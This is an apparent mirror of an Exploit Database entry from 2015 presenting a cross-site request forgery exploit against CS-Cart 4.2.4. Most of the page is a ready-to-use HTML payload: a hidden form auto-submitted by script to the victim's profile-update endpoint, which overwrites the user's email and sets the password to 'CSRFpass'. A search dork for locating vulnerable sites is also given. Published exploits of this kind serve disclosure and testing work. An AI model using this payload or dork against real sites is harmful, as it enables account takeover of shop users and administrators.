CS-Cart 4.2.4 – Cross-Site Request Forgery

• Exploit Database
• 107 阅读

• 作者： Luis Santana
  日期： 2015-03-11
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/36358/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42

  # Exploit Title: CS-Cart 4.2.4 CSRF # Google Dork: intext:"© 2004-2015 Simtech" # Date: March 11, 2015 # Exploit Author: Luis Santana # Vendor Homepage: http://cs-cart.com # Software Link: https://www.cs-cart.com/index.php?dispatch=pages.get_trial&page_id=297&edition=ultimate # Version: 4.2.4 # Tested on: Linux + PHP # CVE : [if one exists, or other VDB reference]   Standard CSRF, allow you to change a users&apos;s password. Fairly lame but I noticed no one had reported this bug yet.   Exploit pasted below and attached.   <html> <head> <title>CS-CART CSRF 0day Exploit</title> </head> <body> <!-- Discovered By: Connection Exploit By: Connection Blacksun Hacker&apos;s Club irc.blacksunhackers.com #lobby --> <form action="http://<victim>/cscart/profiles-update/?selected_section=general" method="POST" id="CSRF" style="visibility:hidden"> <input type="hidden" name="user_data[email]" value="hacked@lol.dongs" /> <input type="hidden" name="user_data[password1]" value="CSRFpass" /> <input type="hidden" name="user_data[password2]" value="CSRFpass" /> <input type="hidden" name="user_data[profile_name]" value="Concept" /> <input type="hidden" name="dispatch[profiles.update]" value="" /> </form> <script> document.getElementById("CSRF").submit(); </script> </body> </html>     Luis Santana - Security+ Administrator - http://hacktalk.net HackTalk Security - Security From The Underground